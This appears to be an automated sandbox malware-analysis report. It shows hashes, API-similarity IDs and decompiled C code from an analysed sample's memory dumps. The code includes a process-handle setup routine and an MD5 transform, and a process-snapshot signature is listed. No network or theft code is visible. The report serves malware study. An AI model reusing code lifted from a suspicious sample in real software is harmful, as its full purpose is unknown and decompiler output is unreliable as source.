                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                                    • Opcode ID: 5c90f35c11408192f2b25764b115ae94bf663930030d1fcfff5b2d0c13653936
                                                                                                                                                                                                    • Instruction ID: 3601aecb646ef3150dd9e5547609b460c42c660ac792af9a13c808bd12f00776
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c90f35c11408192f2b25764b115ae94bf663930030d1fcfff5b2d0c13653936
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DFF0BB32700119FAE720BA769C48DEB776CDFC9314F0101A1ED5BD3006EA24E94786B5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00401799() {
                                                                                                                                                                                                    				void* _t1;
                                                                                                                                                                                                    				unsigned int _t3;
                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                    				long _t5;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				intOrPtr _t10;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t10 =  *0x404130;
                                                                                                                                                                                                    				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                    				 *0x40413c = _t1;
                                                                                                                                                                                                    				if(_t1 == 0) {
                                                                                                                                                                                                    					return GetLastError();
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t3 = GetVersion();
                                                                                                                                                                                                    				if(_t3 != 5) {
                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                    					if(_t14 <= 0) {
                                                                                                                                                                                                    						_t4 = 0x32;
                                                                                                                                                                                                    						return _t4;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					if(_t3 >> 8 > 0) {
                                                                                                                                                                                                    						L5:
                                                                                                                                                                                                    						 *0x40412c = _t3;
                                                                                                                                                                                                    						_t5 = GetCurrentProcessId();
                                                                                                                                                                                                    						 *0x404128 = _t5;
                                                                                                                                                                                                    						 *0x404130 = _t10;
                                                                                                                                                                                                    						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                                    						 *0x404124 = _t6;
                                                                                                                                                                                                    						if(_t6 == 0) {
                                                                                                                                                                                                    							 *0x404124 =  *0x404124 | 0xffffffff;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t14 = _t3 - _t3;
                                                                                                                                                                                                    						goto L4;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}










                                                                                                                                                                                                    0x0040179a
                                                                                                                                                                                                    0x004017a8
                                                                                                                                                                                                    0x004017ae
                                                                                                                                                                                                    0x004017b5
                                                                                                                                                                                                    0x0040180c
                                                                                                                                                                                                    0x0040180c
                                                                                                                                                                                                    0x004017b7
                                                                                                                                                                                                    0x004017bf
                                                                                                                                                                                                    0x004017cc
                                                                                                                                                                                                    0x004017cc
                                                                                                                                                                                                    0x00401808
                                                                                                                                                                                                    0x0040180a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004017c1
                                                                                                                                                                                                    0x004017c8
                                                                                                                                                                                                    0x004017ce
                                                                                                                                                                                                    0x004017ce
                                                                                                                                                                                                    0x004017d3
                                                                                                                                                                                                    0x004017e1
                                                                                                                                                                                                    0x004017e6
                                                                                                                                                                                                    0x004017ec
                                                                                                                                                                                                    0x004017f2
                                                                                                                                                                                                    0x004017f9
                                                                                                                                                                                                    0x004017fb
                                                                                                                                                                                                    0x004017fb
                                                                                                                                                                                                    0x00401805
                                                                                                                                                                                                    0x004017ca
                                                                                                                                                                                                    0x004017ca
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004017ca
                                                                                                                                                                                                    0x004017c8

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,004019D3), ref: 004017A8
                                                                                                                                                                                                    • GetVersion.KERNEL32(?,004019D3), ref: 004017B7
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,004019D3), ref: 004017D3
                                                                                                                                                                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,004019D3), ref: 004017EC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.622657691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.622723835.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 845504543-0
                                                                                                                                                                                                    • Opcode ID: 2346ada5e43696aa4c62ef57380fcce013180e4f54492ec1684d6b5bb7efb1a0
                                                                                                                                                                                                    • Instruction ID: ee408a0d24961c382acf1609eb43580d2b6922f2c255a5e0562ab73f3e6dea1e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2346ada5e43696aa4c62ef57380fcce013180e4f54492ec1684d6b5bb7efb1a0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7BF0FFB16413009BE7116F38BF0D7553FA4A389713F00403AE680FA2F8E3708A818B5C
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 49%
                                                                                                                                                                                                    			E04F699FC(void* __ecx, intOrPtr* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                    				void _v76;
                                                                                                                                                                                                    				intOrPtr* _t226;
                                                                                                                                                                                                    				signed int _t229;
                                                                                                                                                                                                    				signed int _t231;
                                                                                                                                                                                                    				signed int _t233;
                                                                                                                                                                                                    				signed int _t235;
                                                                                                                                                                                                    				signed int _t237;
                                                                                                                                                                                                    				signed int _t239;
                                                                                                                                                                                                    				signed int _t241;
                                                                                                                                                                                                    				signed int _t243;
                                                                                                                                                                                                    				signed int _t245;
                                                                                                                                                                                                    				signed int _t247;
                                                                                                                                                                                                    				signed int _t249;
                                                                                                                                                                                                    				signed int _t251;
                                                                                                                                                                                                    				signed int _t253;
                                                                                                                                                                                                    				signed int _t255;
                                                                                                                                                                                                    				signed int _t257;
                                                                                                                                                                                                    				signed int _t259;
                                                                                                                                                                                                    				signed int _t338;
                                                                                                                                                                                                    				signed char* _t348;
                                                                                                                                                                                                    				signed int _t349;
                                                                                                                                                                                                    				signed int _t351;
                                                                                                                                                                                                    				signed int _t353;
                                                                                                                                                                                                    				signed int _t355;
                                                                                                                                                                                                    				signed int _t357;
                                                                                                                                                                                                    				signed int _t359;
                                                                                                                                                                                                    				signed int _t361;
                                                                                                                                                                                                    				signed int _t363;
                                                                                                                                                                                                    				signed int _t365;
                                                                                                                                                                                                    				signed int _t367;
                                                                                                                                                                                                    				signed int _t376;
                                                                                                                                                                                                    				signed int _t378;
                                                                                                                                                                                                    				signed int _t380;
                                                                                                                                                                                                    				signed int _t382;
                                                                                                                                                                                                    				signed int _t384;
                                                                                                                                                                                                    				intOrPtr* _t400;
                                                                                                                                                                                                    				signed int* _t401;
                                                                                                                                                                                                    				signed int _t402;
                                                                                                                                                                                                    				signed int _t404;
                                                                                                                                                                                                    				signed int _t406;
                                                                                                                                                                                                    				signed int _t408;
                                                                                                                                                                                                    				signed int _t410;
                                                                                                                                                                                                    				signed int _t412;
                                                                                                                                                                                                    				signed int _t414;
                                                                                                                                                                                                    				signed int _t416;
                                                                                                                                                                                                    				signed int _t418;
                                                                                                                                                                                                    				signed int _t420;
                                                                                                                                                                                                    				signed int _t422;
                                                                                                                                                                                                    				signed int _t424;
                                                                                                                                                                                                    				signed int _t432;
                                                                                                                                                                                                    				signed int _t434;
                                                                                                                                                                                                    				signed int _t436;
                                                                                                                                                                                                    				signed int _t438;
                                                                                                                                                                                                    				signed int _t440;
                                                                                                                                                                                                    				signed int _t508;
                                                                                                                                                                                                    				signed int _t599;
                                                                                                                                                                                                    				signed int _t607;
                                                                                                                                                                                                    				signed int _t613;
                                                                                                                                                                                                    				signed int _t679;
                                                                                                                                                                                                    				void* _t682;
                                                                                                                                                                                                    				signed int _t683;
                                                                                                                                                                                                    				signed int _t685;
                                                                                                                                                                                                    				signed int _t690;
                                                                                                                                                                                                    				signed int _t692;
                                                                                                                                                                                                    				signed int _t697;
                                                                                                                                                                                                    				signed int _t699;
                                                                                                                                                                                                    				signed int _t718;
                                                                                                                                                                                                    				signed int _t720;
                                                                                                                                                                                                    				signed int _t722;
                                                                                                                                                                                                    				signed int _t724;
                                                                                                                                                                                                    				signed int _t726;
                                                                                                                                                                                                    				signed int _t728;
                                                                                                                                                                                                    				signed int _t734;
                                                                                                                                                                                                    				signed int _t740;
                                                                                                                                                                                                    				signed int _t742;
                                                                                                                                                                                                    				signed int _t744;
                                                                                                                                                                                                    				signed int _t746;
                                                                                                                                                                                                    				signed int _t748;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t226 = _a4;
                                                                                                                                                                                                    				_t348 = __ecx + 2;
                                                                                                                                                                                                    				_t401 =  &_v76;
                                                                                                                                                                                                    				_t682 = 0x10;
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                                                                                                                                                                                                    					_t401 =  &(_t401[1]);
                                                                                                                                                                                                    					_t348 =  &(_t348[4]);
                                                                                                                                                                                                    					_t682 = _t682 - 1;
                                                                                                                                                                                                    				} while (_t682 != 0);
                                                                                                                                                                                                    				_t6 = _t226 + 4; // 0x14eb3fc3
                                                                                                                                                                                                    				_t683 =  *_t6;
                                                                                                                                                                                                    				_t7 = _t226 + 8; // 0x8d08458b
                                                                                                                                                                                                    				_t402 =  *_t7;
                                                                                                                                                                                                    				_t8 = _t226 + 0xc; // 0x56c1184c
                                                                                                                                                                                                    				_t349 =  *_t8;
                                                                                                                                                                                                    				asm("rol eax, 0x7");
                                                                                                                                                                                                    				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                                                                                                                                                                                                    				asm("rol ecx, 0xc");
                                                                                                                                                                                                    				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                                                                                                                                                                                                    				asm("ror edx, 0xf");
                                                                                                                                                                                                    				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                                                                                                                                                                                                    				asm("ror esi, 0xa");
                                                                                                                                                                                                    				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                                                                                                                                                                                                    				_v8 = _t685;
                                                                                                                                                                                                    				_t690 = _v8;
                                                                                                                                                                                                    				asm("rol eax, 0x7");
                                                                                                                                                                                                    				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                                                                                                                                                                                                    				asm("rol ecx, 0xc");
                                                                                                                                                                                                    				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                                                                                                                                                                                                    				asm("ror edx, 0xf");
                                                                                                                                                                                                    				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                                                                                                                                                                                                    				asm("ror esi, 0xa");
                                                                                                                                                                                                    				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                                                                                                                                                                                                    				_v8 = _t692;
                                                                                                                                                                                                    				_t697 = _v8;
                                                                                                                                                                                                    				asm("rol eax, 0x7");
                                                                                                                                                                                                    				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                                                                                                                                                                                                    				asm("rol ecx, 0xc");
                                                                                                                                                                                                    				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                                                                                                                                                                                                    				asm("ror edx, 0xf");
                                                                                                                                                                                                    				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                                                                                                                                                                                                    				asm("ror esi, 0xa");
                                                                                                                                                                                                    				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                                                                                                                                                                                                    				_v8 = _t699;
                                                                                                                                                                                                    				asm("rol eax, 0x7");
                                                                                                                                                                                                    				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                                                                                                                                                                                    				asm("rol ecx, 0xc");
                                                                                                                                                                                                    				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                                                                                                                                                                                                    				_t508 =  !_t357;
                                                                                                                                                                                                    				asm("ror edx, 0xf");
                                                                                                                                                                                                    				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                                                                                                                                                                                                    				_v12 = _t410;
                                                                                                                                                                                                    				_v12 =  !_v12;
                                                                                                                                                                                                    				asm("ror esi, 0xa");
                                                                                                                                                                                                    				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                                                                                                                                                                                                    				asm("rol eax, 0x5");
                                                                                                                                                                                                    				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                                                                                                                                                                                                    				asm("rol ecx, 0x9");
                                                                                                                                                                                                    				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                                                                                                                                                                                                    				asm("rol edx, 0xe");
                                                                                                                                                                                                    				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                                                                                                                                                                                                    				asm("ror esi, 0xc");
                                                                                                                                                                                                    				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                                                                                                                                                                                                    				asm("rol eax, 0x5");
                                                                                                                                                                                                    				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                                                                                                                                                                                                    				asm("rol ecx, 0x9");
                                                                                                                                                                                                    				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                                                                                                                                                                                                    				asm("rol edx, 0xe");
                                                                                                                                                                                                    				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                                                                                                                                                                                                    				asm("ror esi, 0xc");
                                                                                                                                                                                                    				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                                                                                                                                                                                                    				asm("rol eax, 0x5");
                                                                                                                                                                                                    				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                                                                                                                                                                                                    				asm("rol ecx, 0x9");
                                                                                                                                                                                                    				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                                                                                                                                                                                                    				asm("rol edx, 0xe");
                                                                                                                                                                                                    				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                                                                                                                                                                                                    				asm("ror esi, 0xc");
                                                                                                                                                                                                    				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                                                                                                                                                                                                    				asm("rol eax, 0x5");
                                                                                                                                                                                                    				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                                                                                                                                                                                                    				asm("rol ecx, 0x9");
                                                                                                                                                                                                    				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                                                                                                                                                                                                    				asm("rol edx, 0xe");
                                                                                                                                                                                                    				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                                                                                                                                                                                                    				asm("ror esi, 0xc");
                                                                                                                                                                                                    				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                                                                                                                                                                                                    				asm("rol eax, 0x4");
                                                                                                                                                                                                    				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                                                                                                                                                                                                    				asm("rol ecx, 0xb");
                                                                                                                                                                                                    				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                                                                                                                                                                                                    				asm("rol edx, 0x10");
                                                                                                                                                                                                    				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                                                                                                                                                                                                    				_t599 = _t367 ^ _t420;
                                                                                                                                                                                                    				asm("ror esi, 0x9");
                                                                                                                                                                                                    				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                                                                                                                                                                                                    				asm("rol eax, 0x4");
                                                                                                                                                                                                    				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                                                                                                                                                                                                    				asm("rol edi, 0xb");
                                                                                                                                                                                                    				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                                                                                                                                                                                                    				asm("rol edx, 0x10");
                                                                                                                                                                                                    				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                                                                                                                                                                                                    				_t338 = _t607 ^ _t422;
                                                                                                                                                                                                    				asm("ror ecx, 0x9");
                                                                                                                                                                                                    				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                                                                                                                                                                                                    				asm("rol eax, 0x4");
                                                                                                                                                                                                    				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                                                                                                                                                                                                    				asm("rol esi, 0xb");
                                                                                                                                                                                                    				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                                                                                                                                                                                                    				asm("rol edi, 0x10");
                                                                                                                                                                                                    				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                                                                                                                                                                                                    				_t424 = _t734 ^ _t613;
                                                                                                                                                                                                    				asm("ror ecx, 0x9");
                                                                                                                                                                                                    				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                                                                                                                                                                                                    				asm("rol eax, 0x4");
                                                                                                                                                                                                    				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                                                                                                                                                                                                    				asm("rol edx, 0xb");
                                                                                                                                                                                                    				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                                                                                                                                                                                                    				asm("rol esi, 0x10");
                                                                                                                                                                                                    				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                                                                                                                                                                                                    				asm("ror ecx, 0x9");
                                                                                                                                                                                                    				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                                                                                                                                                                                                    				asm("rol eax, 0x6");
                                                                                                                                                                                                    				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                                                                                                                                                                                                    				asm("rol edx, 0xa");
                                                                                                                                                                                                    				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                                                                                                                                                                                                    				asm("rol esi, 0xf");
                                                                                                                                                                                                    				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                                                                                                                                                                                                    				asm("ror ecx, 0xb");
                                                                                                                                                                                                    				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                                                                                                                                                                                                    				asm("rol eax, 0x6");
                                                                                                                                                                                                    				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                                                                                                                                                                                                    				asm("rol edx, 0xa");
                                                                                                                                                                                                    				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                                                                                                                                                                                                    				asm("rol esi, 0xf");
                                                                                                                                                                                                    				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                                                                                                                                                                                                    				asm("ror ecx, 0xb");
                                                                                                                                                                                                    				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                                                                                                                                                                                                    				asm("rol eax, 0x6");
                                                                                                                                                                                                    				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                                                                                                                                                                                                    				asm("rol edx, 0xa");
                                                                                                                                                                                                    				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                                                                                                                                                                                                    				asm("rol esi, 0xf");
                                                                                                                                                                                                    				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                                                                                                                                                                                                    				asm("ror edi, 0xb");
                                                                                                                                                                                                    				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                                                                                                                                                                                                    				asm("rol eax, 0x6");
                                                                                                                                                                                                    				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                                                                                                                                                                                                    				asm("rol edx, 0xa");
                                                                                                                                                                                                    				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                                                                                                                                                                                                    				_t400 = _a4;
                                                                                                                                                                                                    				asm("rol esi, 0xf");
                                                                                                                                                                                                    				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                                                                                                                                                                                                    				 *_t400 =  *_t400 + _t259;
                                                                                                                                                                                                    				asm("ror eax, 0xb");
                                                                                                                                                                                                    				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                                                                                                                                                                                                    				return memset( &_v76, 0, 0x40);
                                                                                                                                                                                                    			}


































































































                                                                                                                                                                                                    0x04f699ff
                                                                                                                                                                                                    0x04f69a0a
                                                                                                                                                                                                    0x04f69a0d
                                                                                                                                                                                                    0x04f69a10
                                                                                                                                                                                                    0x04f69a11
                                                                                                                                                                                                    0x04f69a2f
                                                                                                                                                                                                    0x04f69a31
                                                                                                                                                                                                    0x04f69a34
                                                                                                                                                                                                    0x04f69a37
                                                                                                                                                                                                    0x04f69a37
                                                                                                                                                                                                    0x04f69a3a
                                                                                                                                                                                                    0x04f69a3a
                                                                                                                                                                                                    0x04f69a3d
                                                                                                                                                                                                    0x04f69a3d
                                                                                                                                                                                                    0x04f69a40
                                                                                                                                                                                                    0x04f69a40
                                                                                                                                                                                                    0x04f69a5d
                                                                                                                                                                                                    0x04f69a60
                                                                                                                                                                                                    0x04f69a76
                                                                                                                                                                                                    0x04f69a79
                                                                                                                                                                                                    0x04f69a93
                                                                                                                                                                                                    0x04f69a96
                                                                                                                                                                                                    0x04f69aac
                                                                                                                                                                                                    0x04f69aaf
                                                                                                                                                                                                    0x04f69ab1
                                                                                                                                                                                                    0x04f69ac9
                                                                                                                                                                                                    0x04f69acc
                                                                                                                                                                                                    0x04f69acf
                                                                                                                                                                                                    0x04f69ae7
                                                                                                                                                                                                    0x04f69aea
                                                                                                                                                                                                    0x04f69b04
                                                                                                                                                                                                    0x04f69b07
                                                                                                                                                                                                    0x04f69b1d
                                                                                                                                                                                                    0x04f69b20
                                                                                                                                                                                                    0x04f69b22
                                                                                                                                                                                                    0x04f69b3a
                                                                                                                                                                                                    0x04f69b3f
                                                                                                                                                                                                    0x04f69b42
                                                                                                                                                                                                    0x04f69b58
                                                                                                                                                                                                    0x04f69b5b
                                                                                                                                                                                                    0x04f69b75
                                                                                                                                                                                                    0x04f69b78
                                                                                                                                                                                                    0x04f69b8e
                                                                                                                                                                                                    0x04f69b91
                                                                                                                                                                                                    0x04f69b93
                                                                                                                                                                                                    0x04f69bae
                                                                                                                                                                                                    0x04f69bb1
                                                                                                                                                                                                    0x04f69bc8
                                                                                                                                                                                                    0x04f69bcb
                                                                                                                                                                                                    0x04f69bcf
                                                                                                                                                                                                    0x04f69be8
                                                                                                                                                                                                    0x04f69beb
                                                                                                                                                                                                    0x04f69bed
                                                                                                                                                                                                    0x04f69bf0
                                                                                                                                                                                                    0x04f69c0b
                                                                                                                                                                                                    0x04f69c0e
                                                                                                                                                                                                    0x04f69c27
                                                                                                                                                                                                    0x04f69c2a
                                                                                                                                                                                                    0x04f69c3a
                                                                                                                                                                                                    0x04f69c3d
                                                                                                                                                                                                    0x04f69c55
                                                                                                                                                                                                    0x04f69c58
                                                                                                                                                                                                    0x04f69c72
                                                                                                                                                                                                    0x04f69c75
                                                                                                                                                                                                    0x04f69c8d
                                                                                                                                                                                                    0x04f69c90
                                                                                                                                                                                                    0x04f69ca6
                                                                                                                                                                                                    0x04f69ca9
                                                                                                                                                                                                    0x04f69cc1
                                                                                                                                                                                                    0x04f69cc4
                                                                                                                                                                                                    0x04f69cdc
                                                                                                                                                                                                    0x04f69cdf
                                                                                                                                                                                                    0x04f69cf9
                                                                                                                                                                                                    0x04f69cfc
                                                                                                                                                                                                    0x04f69d12
                                                                                                                                                                                                    0x04f69d15
                                                                                                                                                                                                    0x04f69d2d
                                                                                                                                                                                                    0x04f69d30
                                                                                                                                                                                                    0x04f69d4a
                                                                                                                                                                                                    0x04f69d4d
                                                                                                                                                                                                    0x04f69d65
                                                                                                                                                                                                    0x04f69d68
                                                                                                                                                                                                    0x04f69d7e
                                                                                                                                                                                                    0x04f69d81
                                                                                                                                                                                                    0x04f69d99
                                                                                                                                                                                                    0x04f69d9c
                                                                                                                                                                                                    0x04f69db4
                                                                                                                                                                                                    0x04f69db7
                                                                                                                                                                                                    0x04f69dc9
                                                                                                                                                                                                    0x04f69dcc
                                                                                                                                                                                                    0x04f69dde
                                                                                                                                                                                                    0x04f69de1
                                                                                                                                                                                                    0x04f69df3
                                                                                                                                                                                                    0x04f69df6
                                                                                                                                                                                                    0x04f69dfa
                                                                                                                                                                                                    0x04f69e0a
                                                                                                                                                                                                    0x04f69e0d
                                                                                                                                                                                                    0x04f69e1b
                                                                                                                                                                                                    0x04f69e1e
                                                                                                                                                                                                    0x04f69e30
                                                                                                                                                                                                    0x04f69e33
                                                                                                                                                                                                    0x04f69e47
                                                                                                                                                                                                    0x04f69e4a
                                                                                                                                                                                                    0x04f69e4c
                                                                                                                                                                                                    0x04f69e5c
                                                                                                                                                                                                    0x04f69e5f
                                                                                                                                                                                                    0x04f69e71
                                                                                                                                                                                                    0x04f69e74
                                                                                                                                                                                                    0x04f69e82
                                                                                                                                                                                                    0x04f69e85
                                                                                                                                                                                                    0x04f69e97
                                                                                                                                                                                                    0x04f69e9a
                                                                                                                                                                                                    0x04f69e9e
                                                                                                                                                                                                    0x04f69eae
                                                                                                                                                                                                    0x04f69eb1
                                                                                                                                                                                                    0x04f69ec3
                                                                                                                                                                                                    0x04f69ec6
                                                                                                                                                                                                    0x04f69ed4
                                                                                                                                                                                                    0x04f69ed7
                                                                                                                                                                                                    0x04f69ee9
                                                                                                                                                                                                    0x04f69eec
